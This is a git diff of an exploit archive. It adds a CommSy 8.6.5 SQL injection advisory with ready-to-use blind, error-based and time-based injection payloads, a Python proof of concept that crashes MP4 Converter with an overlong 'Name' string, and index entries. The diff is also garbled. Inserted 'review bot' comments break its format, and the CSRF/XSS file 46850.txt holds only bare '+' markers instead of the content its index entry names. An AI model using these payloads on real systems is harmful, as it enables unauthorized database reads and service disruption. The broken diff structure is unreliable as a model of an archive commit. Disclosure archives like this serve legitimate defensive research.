diff --git a/exploits/php/remote/46839.rb b/exploits/php/remote/46839.rb
index 571c0d384..034dbe352 100755
--- a/exploits/php/remote/46839.rb
+++ b/exploits/php/remote/46839.rb
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
 'References' =>
 [
 ['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details
- ['URL', 'https://www.php-fusion.co.uk']
+ ['URL', 'https://www.php-fusion.co.uk'],
+ ['URL', 'https://github.com/php-fusion/PHP-Fusion/commit/943432028b9e674433bb3f2a128b2477134110e6']
 ],
 'Platform' => 'php',
 'Arch' => ARCH_PHP,
diff --git a/exploits/php/webapps/46849.txt b/exploits/php/webapps/46849.txt
new file mode 100644
index 000000000..74871475f
--- /dev/null
+++ b/exploits/php/webapps/46849.txt
@@ -0,0 +1,56 @@
+Title:
+======
+CommSy 8.6.5 - SQL injection
+
+Researcher:
+===========
+Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
+
+CVE-ID:
+=======
+CVE-2019-11880
+
+Timeline:
+=========
+2019-04-15 Vulnerability discovered
+2019-04-15 Asked for security contact and PGP key
+2019-04-16 Send details to the vendor
+2019-05-07 Flaw was approved but will not be fixed in branch 8.6
+2019-05-15 Public disclosure
+
+Affected Products:
+==================
+CommSy <= 8.6.5
+
+Vendor Homepage:
+================
+https://www.commsy.net
+
+Details:
+========
+CommSy is a web-based community system, originally developed at the
+University of Hamburg, Germany, to support learning/working communities.
+We have discovered a unauthenticated SQL injection vulnerability in
+CommSy <= 8.6.5 that makes it possible to read all database content. The
+vulnerability exists in the HTTP GET parameter "cid".
+
+Proof of Concept:
+=================
+boolean-based blind:
+commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823
+ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login
+
+error-based:
+commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT
+COUNT(*),CONCAT(0x716a767871,(SELECT
+(ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login
+
+time-based blind:
+commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login
+
+Fix:
+====
+According to the manufacturer, the version branch 8.6 is no longer
+supported and the vulnerability will not be fixed. Customers should
+update to the newest version 9.2.
\ No newline at end of file
diff --git a/exploits/php/webapps/46850.txt b/exploits/php/webapps/46850.txt
new file mode 100644
index 000000000..36053e8bb
--- /dev/null
+++ b/exploits/php/webapps/46850.txt
@@ -0,0 +1,118 @@ + + + + + +
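Review bot: The Fix section of 46849.txt leaves operators of the 8.6 branch with no interim control, although the Timeline says the flaw will not be fixed there and the only advice is to move to 9.2. All three examples pass `cid=101`, so the parameter looks like a numeric context id (inferred from the examples, not stated in the advisory). If that holds, a sentence such as `Until upgraded, reject requests whose cid is not purely numeric at the web server or WAF, and review access logs for cid values containing quotes or SQL keywords` would give defenders both a mitigation and a detection hint.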
+ + + + + + + + + + + + + + + + + + + + + + + +
\ No newline at end of file
diff --git a/exploits/windows/dos/46848.py b/exploits/windows/dos/46848.py
new file mode 100755
index 000000000..a6dff74f8
--- /dev/null
+++ b/exploits/windows/dos/46848.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: MP4 Converter 3.25.22 - 'Name' Denial of Service (PoC)
+# Date: 14/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.tomabo.com/
+# Software: http://www.tomabo.com/downloads/mp4-converter-setup.exe
+# Version: 3.25.22
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "MP4Converter.py", it will create a new file "MP4Converter.txt"
+# 2.- Copy the text from the generated MP4Converter.txt file to clipboard
+# 3.- Open MP4 Converter
+# 4.- Select 'Options' > 'Video/Audio Formats'
+# 5.- Click 'Add Preset' and paste clipboard in the field 'Name'
+# 6.- Click 'OK' and click 'Reset All'
+# 7.- Crashed
+
+buffer = "\x41" * 10000
+f = open ("MP4Converter.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index cc245b1cc..2e60d1548 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
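Review bot: The header comment of 46848.py stops at "7.- Crashed" and never records what the crash was, so anyone triaging the entry cannot tell a benign fault from memory corruption; a line such as `# Observed: <exception code / faulting module - fill in>` would close that gap. The last four lines open `MP4Converter.txt` without a context manager and bind the name `buffer`, which shadows a Python 2 builtin; `with open("MP4Converter.txt", "w") as f: f.write(payload)` closes the handle even if the write fails. Step 1 also refers to `MP4Converter.py`, while the file is added as `46848.py`.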
@@ -6426,6 +6426,7 @@ id,file,description,date,author,type,platform,port
 46843,exploits/windows/dos/46843.py,"TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
 46844,exploits/windows/dos/46844.py,"TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
 46845,exploits/windows/dos/46845.py,"TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
+46848,exploits/windows/dos/46848.py,"Tomabo MP4 Converter 3.25.22 - Denial of Service (PoC)",2019-05-15,"Alejandra Sánchez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41272,3 +41273,5 @@ id,file,description,date,author,type,platform,port
 46841,exploits/hardware/webapps/46841.txt,"D-Link DWL-2600AP - Multiple OS Command Injection",2019-05-14,"Raki Ben Hamouda",webapps,hardware,
 46846,exploits/php/webapps/46846.txt,"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection",2019-05-14,"Julien Ahrens",webapps,php,80
 46847,exploits/php/webapps/46847.txt,"PasteShr 1.6 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80
+46849,exploits/php/webapps/46849.txt,"CommSy 8.6.5 - SQL injection",2019-05-15,"Jens Regel_ Schneider_ Wulf",webapps,php,
+46850,exploits/php/webapps/46850.txt,"Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting",2019-05-15,LiquidWorm,webapps,php,
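Review bot: The new `46848` row in the first hunk drops the affected field that the file's own header names (`'Name' Denial of Service (PoC)`), while the neighbouring rows 46843–46845 keep theirs in quotes. A description of `"Tomabo MP4 Converter 3.25.22 - 'Name' Denial of Service (PoC)"` would keep the index searchable by input field. In the second hunk, the `46849` author value `"Jens Regel_ Schneider_ Wulf"` differs from the advisory's researcher line ("Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG"). That field is already quoted, so the commas would not need replacing, though the underscores may be an index convention that is not visible in this diff.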